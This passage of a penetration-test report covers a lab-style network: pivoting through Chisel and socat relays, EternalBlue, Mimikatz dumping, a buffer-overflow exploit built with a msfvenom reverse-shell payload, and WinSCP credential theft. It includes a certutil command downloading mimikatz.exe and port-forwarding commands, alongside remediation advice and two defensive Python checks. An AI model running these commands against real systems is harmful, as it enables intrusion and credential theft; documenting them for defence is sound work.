user accounts and escalate privileges within the network. Both modules require local
administrator (SYSTEM) rights, so they presuppose a host that is already compromised.

Analysis
Using Mimikatz, which we had previously downloaded to the host with certutil from the
compromised web server:
certutil -split -urlcache -f http://10.90.60.80:5923/pdf/mimikatz.exe

Figure 2.2.1a: Mimikatz lsadump::sam


Figure 2.2.1b: Mimikatz lsadump::secrets

Remediation Plan

● Regularly apply patches and updates.

● lsadump::sam and lsadump::secrets require local administrator (SYSTEM) rights: limit
local administrator membership, give every host a unique local administrator password
(e.g. with Microsoft LAPS) so that dumped hashes cannot be reused for lateral
movement, and do not log on to workstations with domain-privileged accounts.

● Reduce what is recoverable from memory: on Windows 7 install KB2871997 and set
HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest\UseLogonCredential
to 0; on supported Windows versions enable LSA protection (RunAsPPL) and Credential
Guard.

● Disable NTLM authentication where possible and use Kerberos.

References

• https://www.lockardsecurity.com/2023/04/13/how-to-detect-and-prevent-the-hacking-tool-mimikatz/


2.3 - Previous Pivoting Setup


In order to reach machine 10.185.10.27 we extend the Chisel tunnel: the Chisel server stays on
our attacking machine and the connection is relayed through 10.90.60.80, so that commands for
10.185.10.27 can be sent from our machine.

Figure 2.3.2: Getting files with Certutil command

On 10.90.60.80 we run socat to listen and forward traffic to the attacking machine 172.16.40.5
with the following command: socat TCP-LISTEN:5543,fork TCP:172.16.40.5:33

On 10.185.10.34 we run the Chisel client, which connects to the socat listener and so reaches
the Chisel server on the attacking machine.

Figure 2.3.3: Connection to Chisel Server

We check the Chisel server on the attacking machine to see if the tunnel has been created.

Figure 2.3.4: New tunnel on Chisel Server


Finally we add the proxy endpoint exposed by the new tunnel to the /etc/proxychains4.conf
file.

Figure 2.3.5: Edit /etc/proxychains4.conf file


3 – 10.185.10.27

Host: 10.185.10.27
OS: Windows 7 SP1

Port   Protocol / Service
135    MSRPC
139    NetBIOS-SSN
445    SMB

Figure 3a: NMAP - Proxychains


3.1 – Eternal Blue – CVE-2017-0144 (MS17-010)

CRITICAL

Exploitation Likelihood Likely

Business Impact Major

Remediation Difficulty Easy

Type Remote Code Execution

Description
EternalBlue is a critical vulnerability in Microsoft's Server Message Block (SMB) protocol,
identified as CVE-2017-0144. Discovered by the NSA and later leaked by the hacking group
Shadow Brokers, this flaw allows remote attackers to execute arbitrary code on unpatched
Windows systems without requiring user interaction. EternalBlue exploits a flaw in the SMBv1
protocol, enabling attackers to gain full control of the affected machine.

Analysis
We check with Nmap's smb-vuln-ms17-010 script whether the host is vulnerable to EternalBlue.


Figure 3.1.1: NMAP – Eternal Blue Check

We download the Auto Blue repository from Github.

Figure 3.1.2: Download Auto Blue repository


We generate the payload with the script shell_code.sh.

Figure 3.1.3: Generating Exploit

Because the reverse shell connects back to 10.90.60.80, we listen there with socat and
forward the traffic to port 3333 on the attacking machine.

Figure 3.1.4: Redirect traffic with Socat


We listen with Netcat on the attacking machine and run the exploit through proxychains.

Figure 3.1.5: Executing Exploit

The reverse shell connects back and we have administrator privileges on the host.

Figure 3.1.6: Connection to the Host

Remediation Plan

• Apply the MS17-010 security update (KB4012212 / KB4012215 for Windows 7 SP1) and
disable SMBv1. EternalBlue requires no credentials, so patching or removing SMBv1 is
the only effective control.

• Windows 7 reached end of support in January 2020. If possible, upgrade to a supported
Windows release (Windows 10 or later).

References

• https://github.com/3ndG4me/AutoBlue-MS17-010


3.2 – Dumped Credentials - Mimikatz

HIGH

Exploitation Likelihood Likely

Business Impact Major

Remediation Difficulty Easy

Type Credentials saved in memory

Description
Credential dumping with Mimikatz is a technique where an attacker uses the Mimikatz tool to
extract plaintext passwords, hash values, PINs, and Kerberos tickets from memory on a
Windows system. This allows attackers to gain unauthorized access to user accounts and
escalate privileges within the network.

Analysis
Using Mimikatz, which we had previously downloaded to the host with certutil from the
compromised web server:
certutil -split -urlcache -f http://10.90.60.80:5923/pdf/mimikatz.exe

Figure 3.2.1a: Mimikatz lsadump::sam


Figure 3.2.1b: Mimikatz lsadump::secrets

Remediation Plan

● Regularly apply patches and updates.

● lsadump::sam and lsadump::secrets require local administrator (SYSTEM) rights: limit
local administrator membership, give every host a unique local administrator password
(e.g. with Microsoft LAPS) so that dumped hashes cannot be reused for lateral
movement, and do not log on to workstations with domain-privileged accounts.

● Reduce what is recoverable from memory: on Windows 7 install KB2871997 and set
HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest\UseLogonCredential
to 0; on supported Windows versions enable LSA protection (RunAsPPL) and Credential
Guard.

● Disable NTLM authentication where possible and use Kerberos.

References

• https://www.lockardsecurity.com/2023/04/13/how-to-detect-and-prevent-the-hacking-tool-mimikatz/


3.3 – Information Disclosure

LOW

Exploitation Likelihood Likely

Business Impact Minor

Remediation Difficulty Easy

Type Information Disclosure

Description
Information disclosure is a security vulnerability where sensitive data is unintentionally exposed
to unauthorized users. This can include system configurations, user credentials, personal data,
and internal network information. Information disclosure can occur through various means, such
as error messages, improper access controls, insecure data transmission, or flaws in application
design.

Analysis
By enumerating directories we found a file that contains information about another host on the network.

Figure 3.3.1: Information about a Host

Remediation Plan

• Delete the file

• To mitigate this risk, it is essential to implement proper data handling practices, enforce
strict access controls, securely configure systems, and regularly audit for potential leaks.

3.4 – Previous Pivoting Setup

In order to reach machine 10.185.10.55 we need to run a Chisel server on our attacking machine
and, through host 10.90.60.80, create a tunnel over which we can send commands to machine
10.185.10.55 from our machine.

Figure 3.4.1: Socat on 10.90.60.80 listening to 10.185.10.27

We move the files to machine 10.185.10.27 and run chisel in client mode.

Figure 3.4.2: Connection with the Chisel Server

Figure 3.4.3: New tunnel created

Figure 3.4.4: Edit /etc/proxychains4.conf file

4 – 10.185.10.55

10.185.10.55
Windows

#  Port   Protocol / Service
1  42424  Customer Manager Portal

Figure 4a: NMAP - Proxychains

4.1 – Buffer Over Flow (BOF)

HIGH

Exploitation Likelihood Possible

Business Impact Major

Remediation Difficulty Moderate

Type Buffer Over Flow

Description
A buffer overflow is a type of security vulnerability that occurs when a program writes more data
to a buffer than it can hold. Buffers are contiguous blocks of memory that store data temporarily.
When a buffer overflows, the excess data can overwrite adjacent memory, leading to
unpredictable behavior, crashes, or the execution of malicious code.

Attackers exploit buffer overflows by carefully crafting input data that exceeds the buffer's
capacity and includes executable code. This malicious code can then be executed with the
privileges of the vulnerable program, potentially allowing the attacker to gain unauthorized
access, escalate privileges, or take control of the affected system.

Analysis
Previously we downloaded the files from the C:\Users\developer\Desktop\CustomerManagerDev
directory on machine 10.185.10.34 and transferred them to a local Windows machine of ours in
order to run tests before attacking host 10.185.10.55.

With the Immunity Debugger tool and the mona.py script (which we previously had to copy into
the PyCommands folder of Immunity Debugger) we recreate the same scenario as on machine
10.185.10.55, so that we can design the final payload used to gain access later.

We open Immunity Debugger, load the CustomerManagerService.exe file and set the folder
containing that file as the working folder.

Figure 4.1.1: Setting Working Folder

We write a fuzzing script to find out at how many bytes of input the program crashes, and then obtain the offset.

Figure 4.1.2: Fuzzing.py

Figure 4.1.3: Crashes at 100 bytes of data

Now we will create another script that we will modify throughout the exploitation.

Figure 4.1.4: Exploit.py

With the Metasploit module pattern_create.rb we generate 500 bytes of data, which we later compare in
Immunity Debugger to calculate the offset.

Figure 4.1.5: pattern_create.rb metasploit module

Figure 4.1.6: Add payload to exploit.py

Now the program crashes and gives us a different EIP number.

Figure 4.1.7: Crash and new EIP number

With another Metasploit module (pattern_offset.rb) we calculate the offset and add it to
exploit.py.

Figure 4.1.8: Calculating the Offset

Figure 4.1.9: Edit exploit.py

Figure 4.1.10: Controlling the EIP

Once we control EIP, we add the bad-character test string to our exploit.

Figure 4.1.11: Badchars

We enter the following mona command in Immunity Debugger: !mona bytearray -b "\x00" and
run exploit.py again.

Figure 4.1.12: mona bytearray command

We compare with mona: !mona compare C:\The_Working_Folder\bytearray.bin -a ESP_number

Figure 4.1.13: mona bytearray compare

This first comparison reports the badchars \x00 and \x0a.

Figure 4.1.14: Badchars

We repeat the process until we have found all the badchars the program has, which are the
following: \x00\x0a\x0d

Now we paste the full bad-character string into exploit.py (with \x00\x0a\x0d removed) and run
exploit.py again.

Figure 4.1.15: Setting Badchars on the Payload

We run exploit.py again and no more badchars appear.

Figure 4.1.16: No more badchars

Now we have to find a JMP ESP pointer with the following mona command: !mona jmp -r esp -cpb
"\x00\x0a\x0d"

Figure 4.1.17: Finding the pointer

Having the pointer (080416bf), we have to write it in reverse (little-endian) byte order: "\xBF\x16\x04\x08"

We also have to generate the payload with msfvenom to gain access through a reverse shell
with the following command: msfvenom -p windows/shell_reverse_tcp LHOST=10.185.10.27
LPORT=8887 -b "\x00\x0a\x0d" -f python

Now we just need to edit the CustomerManagerClient.py file and add all the data and run it with
proxychains and Python2: proxychains python2 CustomerManagerClient.py

Figure 4.1.18: CustomerManagerClient.py file

Once executed, it will send the reverse shell to machine 10.185.10.27 through port 8887, which
will forward it to machine 10.90.60.80 through port 7776, which in turn will redirect it to our
machine through port 8181.

Figure 4.1.19: Host 10.185.10.27 listening at 8887 and send to 10.90.60.80

Figure 4.1.20: Host 10.90.60.80 listening at 7776 and send to 172.16.40.5

Figure 4.1.21: Connection to 10.185.10.55 Host
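As an added example (not part of the report or of the CustomerManagerService.exe code), the Python below reads the DllCharacteristics field of a PE optional header and reports whether a binary opted into ASLR (DYNAMIC_BASE), DEP (NX_COMPAT) and related mitigations; a hard-coded JMP ESP address and shellcode executing at ESP, as used above, rely on those being absent. No real binary is parsed: the build_minimal_pe() helper constructs a header-only PE image so the check runs offline.

```python
"""Added example (not part of the report): read DllCharacteristics from a PE
optional header to see which exploit mitigations a service binary opted into.
build_minimal_pe() constructs a header-only PE image for demonstration."""
import struct
from typing import Dict

# IMAGE_DLLCHARACTERISTICS_* bits from the PE specification.
FLAGS = {
    "HIGH_ENTROPY_VA": 0x0020,
    "DYNAMIC_BASE": 0x0040,   # ASLR; a fixed image base is what makes a hard-coded JMP ESP reliable
    "NX_COMPAT": 0x0100,      # DEP; without it, code placed on the stack can execute
    "NO_SEH": 0x0400,
    "GUARD_CF": 0x4000,
}
PE32_MAGIC, PE32PLUS_MAGIC = 0x10B, 0x20B
DLLCHAR_OFFSET = 70  # DllCharacteristics offset inside the optional header (PE32 and PE32+)


def read_dll_characteristics(data: bytes) -> int:
    """Locate the optional header via e_lfanew and return its DllCharacteristics."""
    if data[:2] != b"MZ":
        raise ValueError("missing MZ signature")
    (e_lfanew,) = struct.unpack_from("<I", data, 0x3C)
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    coff = e_lfanew + 4                        # 20-byte COFF file header
    (size_of_optional,) = struct.unpack_from("<H", data, coff + 16)
    opt = coff + 20
    (magic,) = struct.unpack_from("<H", data, opt)
    if magic not in (PE32_MAGIC, PE32PLUS_MAGIC):
        raise ValueError(f"unexpected optional header magic {magic:#x}")
    if size_of_optional < DLLCHAR_OFFSET + 2:
        raise ValueError("optional header too short")
    (dllchars,) = struct.unpack_from("<H", data, opt + DLLCHAR_OFFSET)
    return dllchars


def mitigation_report(data: bytes) -> Dict[str, bool]:
    """Map each mitigation name to whether the binary opted in."""
    dllchars = read_dll_characteristics(data)
    return {name: bool(dllchars & bit) for name, bit in FLAGS.items()}


def build_minimal_pe(dll_characteristics: int, pe32plus: bool = False) -> bytes:
    """Constructed header-only PE image (no sections) used to exercise the parser."""
    dos = bytearray(64)
    dos[:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, 64)          # e_lfanew -> right after the DOS header
    opt_size = 240 if pe32plus else 224
    # Machine, NumberOfSections, TimeDateStamp, PointerToSymbolTable,
    # NumberOfSymbols, SizeOfOptionalHeader, Characteristics
    coff = struct.pack("<HHIIIHH", 0x8664 if pe32plus else 0x14C, 0, 0, 0, 0, opt_size, 0x0102)
    opt = bytearray(opt_size)
    struct.pack_into("<H", opt, 0, PE32PLUS_MAGIC if pe32plus else PE32_MAGIC)
    struct.pack_into("<H", opt, DLLCHAR_OFFSET, dll_characteristics)
    return bytes(dos) + b"PE\0\0" + coff + bytes(opt)


if __name__ == "__main__":
    # A legacy-style build with no mitigations next to a hardened rebuild.
    for label, flags in (("legacy", 0), ("hardened", 0x0140)):
        print(label, mitigation_report(build_minimal_pe(flags)))
```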

Remediation Plan

• Use modern languages: Prefer languages with automatic memory management, like
Python or Java.

• Safe Libraries: Use functions with built-in bounds checking, such as strncpy instead of
strcpy.

• Code Reviews: Regularly review code and use static analysis tools.

References

• https://www.synopsys.com/blogs/software-security/detect-prevent-and-mitigate-buffer-overflow-attacks.html

4.2 – WinSCP Credentials in Memory

HIGH

Exploitation Likelihood Possible

Business Impact Major

Remediation Difficulty Easy

Type Information Disclosure

Description
The Metasploit module Windows Gather Credentials WinSCP is used to dump credentials from
the WinSCP application on a compromised Windows system. This module exploits the fact that
WinSCP can store user credentials, such as usernames and passwords, in its configuration files
and memory. By accessing these stored credentials, an attacker can gain unauthorized access
to various systems and services.

Analysis

Enumerating the directories and files of machine 10.185.10.55 we find that it possibly has
WinSCP installed, and we verify that there is a module in metasploit to be able to obtain
credentials used in WinSCP that are saved in memory.

Figure 4.2.1: WinSCP Installer

We need a meterpreter session on host 10.185.10.55. Since we had not been pivoting with
Metasploit so far, we now set that up in order to gain access and exploit the vulnerability.

We exploited the aforementioned PHP_CGI vulnerability on host 10.90.60.80 to obtain a
meterpreter session.

We add the network segment 10.185.10.0/24 with the Metasploit autoroute module in the
meterpreter session that we have on host 10.90.60.80.

Figure 4.2.2: Adding network segment 10.185.10.0/24

With msfvenom we create a payload that, when executed, connects to machine 10.185.10.27 on
port 6565. On machine 10.185.10.27 we run the command: netsh interface portproxy add v4tov4
listenaddress=10.185.10.27 listenport=6565 connectaddress=172.16.40.5 connectport=6565 so
that this traffic is forwarded to our attacking machine on the same port 6565.

Figure 4.2.3: Creating payload and share to 10.90.60.80 host

Figure 4.2.4: Getting the payload on the 10.185.10.55 host

Now we listen using metasploit.

Figure 4.2.5: Listening with metasploit

All that remains is to execute the payload on host 10.185.10.55 and we will receive a
meterpreter session.

Figure 4.2.6: Receiving the meterpreter session

Now we can use the metasploit module to dump the saved WinSCP credentials.

Figure 4.2.7: Extracting WinSCP credentials

As we can see, we have found a new host 10.185.11.127 and its credentials to enter via SSH.

Figure 4.2.8: Windows Ping Sweep on 10.185.11.0/24 subnet

Remediation Plan

• Use a master password on WinSCP

• Upgrade WinSCP to the latest stable version

• Separate the credentials from the script/code into a configuration file. While the
script/code without explicit credentials can be safely stored in a revision control system and
be otherwise accessible, the configuration file should be protected as much as possible. In
particular, its file permissions should be restricted to administrators (for writing) and the
user under which the script/code runs (for reading). The configuration file can also be
encrypted, for example with built-in NTFS filesystem-level encryption.

References

• https://winscp.net/eng/docs/guide_protecting_credentials_for_automation

5 – 10.185.11.127

10.185.11.127
Linux

#  Port  Protocol / Service
1  22    SSH

Figure 5a: NMAP - Proxychains

5.1 – Privilege Escalation

CRITICAL

Exploitation Likelihood Possible

Business Impact Major

Remediation Difficulty Moderate

Type Security Misconfiguration

Description
Privilege escalation is a type of security vulnerability where an attacker gains elevated access to
resources that are normally protected from an application or user. This can occur in two forms:
1. Vertical Privilege Escalation: The attacker gains higher-level access than intended,
such as gaining administrative privileges.
2. Horizontal Privilege Escalation: The attacker accesses resources or functions
intended for other users with similar access levels.
Exploiting privilege escalation vulnerabilities can lead to unauthorized access to sensitive data,
the ability to alter system configurations, or even full control over the affected system. This
makes it crucial for systems to enforce strict access controls and regularly update and patch
software to prevent such exploits.

Analysis
Previously, on host 10.185.10.55, we found the SSH access credentials for machine
10.185.11.127.

Figure 5.1.1: Connection to 10.185.11.127 Host - SSH

Once we are inside, listing directories and files we find a file called z-cmd.php.

Figure 5.1.2: Connection to 10.185.11.127 Host – SSH

This code is a web shell that executes arbitrary system commands passed via the POST
parameter z. Since the file is owned by root with mode -rw-r--r-- (read and write for root,
read-only for everyone else), it can be leveraged to escalate privileges if it is accessible via
a web server.

To escalate privileges, we can run a command that gives us administrator access. For example,
we can add the user Jimmy or a new one to the sudoers file.
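As an added example (not part of the report), the Python audit below walks a web root for PHP files that pass request parameters into a command-execution function, the pattern of z-cmd.php, and records owner and mode for each hit so a responder can see cases like a root-owned, world-readable shell. The sample web root is constructed in a temporary directory; every file name except z-cmd.php is invented.

```python
"""Added example (not part of the report): find PHP files that hand request
input to a command-execution function (the z-cmd.php pattern from 5.1) and
report their ownership and permissions. Sample files are constructed."""
import os
import re
import stat
import tempfile
from typing import Dict, List

EXEC_FUNCS = r"(?:system|exec|shell_exec|passthru|popen|proc_open)"
# A call to one of the functions above whose argument list (up to the closing
# ");") contains a request superglobal. DOTALL lets the arguments span lines.
DANGEROUS_CALL = re.compile(
    rf"\b{EXEC_FUNCS}\s*\((?:(?!\)\s*;).)*\$_(?:GET|POST|REQUEST|COOKIE)\b",
    re.IGNORECASE | re.DOTALL,
)

# Constructed sample files: a shell, an ordinary page, and a safe use of shell_exec.
SAMPLE_FILES = {
    "z-cmd.php": "<?php\nif (isset($_POST['z'])) { system($_POST['z']); }\n?>",
    "index.php": "<?php echo 'hello ' . htmlspecialchars($_GET['name']); ?>",
    "cron.php": "<?php $out = shell_exec('/usr/bin/uptime'); echo $out; ?>",
}


def file_facts(path: str) -> Dict[str, object]:
    """Ownership and permission details a responder wants next to each hit."""
    st = os.stat(path)
    return {
        "path": path,
        "owner_uid": st.st_uid,
        "owned_by_root": st.st_uid == 0,
        "mode": stat.filemode(st.st_mode),
        "world_readable": bool(st.st_mode & stat.S_IROTH),
    }


def audit_webroot(root: str) -> List[Dict[str, object]]:
    """Return facts for every PHP file that pipes request input into a shell call."""
    hits = []
    for dirpath, _, files in os.walk(root):
        for name in sorted(files):
            if not name.lower().endswith((".php", ".phtml")):
                continue
            path = os.path.join(dirpath, name)
            with open(path, "r", encoding="utf-8", errors="replace") as fh:
                if DANGEROUS_CALL.search(fh.read()):
                    hits.append(file_facts(path))
    return hits


def build_sample_webroot() -> str:
    """Write the constructed sample files into a fresh temporary directory."""
    root = tempfile.mkdtemp(prefix="webroot_")
    for name, body in SAMPLE_FILES.items():
        with open(os.path.join(root, name), "w", encoding="utf-8") as fh:
            fh.write(body)
    return root


if __name__ == "__main__":
    for hit in audit_webroot(build_sample_webroot()):
        print(hit)
```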

Figure 5.1.3: Execution of the Curl command

Remediation Plan

• Use Web Application Firewalls: Deploy a WAF to detect and block malicious requests
that attempt to exploit vulnerabilities in web applications.

• Remove Unnecessary Files: Regularly clean up your web server directories and remove
files that are not needed, especially those left by developers or during testing phases.

• Ensure sensitive files, especially those that can execute commands, are not accessible
to unauthorized users. Set appropriate file permissions and ownership.

References

• https://www.paloaltonetworks.com/cyberpedia/what-is-a-web-application-firewall

REMEDIATION PLAN
1 – 10.90.60.80 (NOMBRECLIENTE Web Server)

1.1 – SQL Injection


• Mitigating SQL injection primarily involves input validation. Input validation ensures that
the type, length, and format of user input are acceptable, allowing only valid data to be
processed. This prevents malicious commands from being executed. Key practices
include using regular expressions as whitelists for structured data and ensuring fixed set
values (e.g., from drop-down lists) match one of the offered options exactly.

1.2 – PHP Common Gateway Interface (CGI) – CVE-2012-1823


• Upgrade to PHP version 5.3.12, PHP version 5.4.2, or a later release. Alternatively, you
can use this 'mod_rewrite' rule as a temporary solution:

RewriteCond %{QUERY_STRING} ^(%2d|-)[^=]+$ [NC]
RewriteRule ^(.*) $1?

1.3 – Cross Site Scripting (XSS)


• Escaping: This involves processing user input to ensure it is safe before rendering it. By
escaping key characters like < and >, you prevent them from being interpreted
maliciously.

• Validating Input: This ensures only correct data is rendered by the application,
preventing malicious input. Whitelisting known good characters is more effective than
blacklisting bad characters for preventing XSS.

• Sanitizing: This method cleans user input to remove potentially harmful markup,
especially useful for sites that allow HTML. It should be used alongside escaping and
validating input for robust protection.

1.4 – Unrestricted File Upload


• Content-Type Header Validation: Ensure the "Content-Type" header in the request
indicates a valid file type. However, this can be bypassed by altering the header using a
web proxy.

• Whitelisting File Extensions: Use a whitelist to validate file extensions, ensuring to
review the list for potentially malicious extensions. Also, watch for bypass techniques like
double extensions.

• File Type Detector: Employ functions or APIs to check file types by examining the file's
initial characters or headers. Be cautious as attackers can insert malicious code within
valid headers or file metadata, and obfuscate or encode it to bypass detection. Ensure
the application handles compressed files securely to prevent crafting of malicious code.

1.5 – Privilege Escalation


• A low-privileged user should never be allowed to execute commands as a root user or
alter files that belong to root or are located in the root directory under any circumstances.

1.6 – Information Disclosure


• If storing credentials in configuration files is unavoidable, ensure the files are encrypted
using strong encryption standards like AES-256. Ensure only authorized processes or
users can decrypt and access these files.

• Use secrets management solutions like HashiCorp Vault, AWS Secrets Manager, or
Azure Key Vault to securely store and manage access to sensitive information.

• Replace MD5 with more secure algorithms like bcrypt, Argon2, or SHA-256. These
algorithms provide better security through stronger hashing and built-in mechanisms
to mitigate brute force attacks.

2 – 10.185.10.34

2.1 – Eternal Blue / PSEXEC - CVE-2017-0144 (MS17-010)


• The way to prevent entry through the psexec module (which abuses the MS17-010
vulnerability) is to apply the Windows 7 security patch.

• If it’s possible, upgrade to the next version of Windows (Preferably Windows 10)

2.2 – Dumped Credentials – Mimikatz


• Regularly apply patches and updates

• Disable NTLM Authentication: Use secure protocols like Kerberos

3 – 10.185.10.27

3.1 – Eternal Blue – CVE-2017-0144 (MS17-010)


• The way to prevent entry through the psexec module (which abuses the MS17-010
vulnerability) is to apply the Windows 7 security patch.

• If it’s possible, upgrade to the next version of Windows (Preferably Windows 10).

3.2 – Dumped Credentials – Mimikatz


• Regularly apply patches and updates

• Disable NTLM Authentication: Use secure protocols like Kerberos

3.3 – Information Disclosure


• Delete the file

• To mitigate this risk, it is essential to implement proper data handling practices, enforce
strict access controls, securely configure systems, and regularly audit for potential leaks.

4 – 10.185.10.55

4.1 – Buffer Over Flow (BOF)


• Use modern languages: Prefer languages with automatic memory management, like
Python or Java.

• Safe Libraries: Use functions with built-in bounds checking, such as strncpy instead of
strcpy.

• Code Reviews: Regularly review code and use static analysis tools.

4.2 – WinSCP Credentials in Memory


• Use a master password on WinSCP

• Upgrade WinSCP to the latest stable version

• Separate the credentials from the script/code into a configuration file. While the
script/code without explicit credentials can be safely stored in a revision control system and
be otherwise accessible, the configuration file should be protected as much as possible. In
particular, its file permissions should be restricted to administrators (for writing) and the
user under which the script/code runs (for reading). The configuration file can also be
encrypted, for example with built-in NTFS filesystem-level encryption.

5 – 10.185.11.127

5.1 – Privilege Escalation


• Use Web Application Firewalls: Deploy a WAF to detect and block malicious requests
that attempt to exploit vulnerabilities in web applications.

• Remove Unnecessary Files: Regularly clean up your web server directories and remove
files that are not needed, especially those left by developers or during testing phases.

• Ensure sensitive files, especially those that can execute commands, are not accessible
to unauthorized users. Set appropriate file permissions and ownership.

EXPLOITED HOSTS AND VULNERABILITIES

HOST (IP)      | OPEN PORTS      | SERVICES                  | ACCESS OBTAINED | VULNERABILITIES EXPLOITED
10.90.60.80    | 80 / 5923       | HTTP                      | YES             | SQL Injection / PHP_CGI / XSS / Unrestricted File Upload / Privilege Escalation / Information Disclosure
10.185.10.34   | 135 / 139 / 445 | Msrpc / Netbios-ssn / SMB | YES             | Eternal Blue CVE-2017-0144 (MS17-010) / Dumped Credentials - Mimikatz
10.185.10.27   | 135 / 139 / 445 | Msrpc / Netbios-ssn / SMB | YES             | Eternal Blue – CVE-2017-0144 (MS17-010) / Dumped Credentials – Mimikatz / Information Disclosure
10.185.10.55   | 42424           | Customer Manager Portal   | YES             | Buffer Over Flow (BOF) / WinSCP Credentials in Memory
10.185.11.127  | 22              | SSH                       | YES             | Privilege Escalation

APPENDIX A – TOOLS USED


TOOL DESCRIPTION

BurpSuite Community Edition Used for testing of web applications.

Chisel Used for creating secure tunnels to bypass firewalls.

Gobuster Used for brute-force scanning of URLs, directories, and files.

Metasploit Used for exploitation of vulnerable services and vulnerability scanning.

Mimikatz Used for extracting passwords and other credential information.

Nikto Used for scanning web servers for vulnerabilities.

Nmap Used for scanning ports on hosts.

Smbclient Used for accessing shared folders on SMB/CIFS networks.

Socat Used for data transfer between two places, acting as a relay.

Sqlmap Used for detecting and exploiting SQL injection flaws.

Table A.1: Tools used during assessment

APPENDIX B - ENGAGEMENT INFORMATION

Client Information

Client NOMBRECLIENTE

Primary Contact Adams Brown, CEO

Approvers The following people are authorized to change the scope of the engagement and
modify the terms of the engagement:
● Adams Brown
● David Parker

Version Information

Version Date Description

1.0 03/06/2024 Initial report to client

Contact Information

Name CYBERLAND SEC

Address 1001 Roland Street, Gotham, NY 11201

Phone 555-185-1782

Email [email protected]
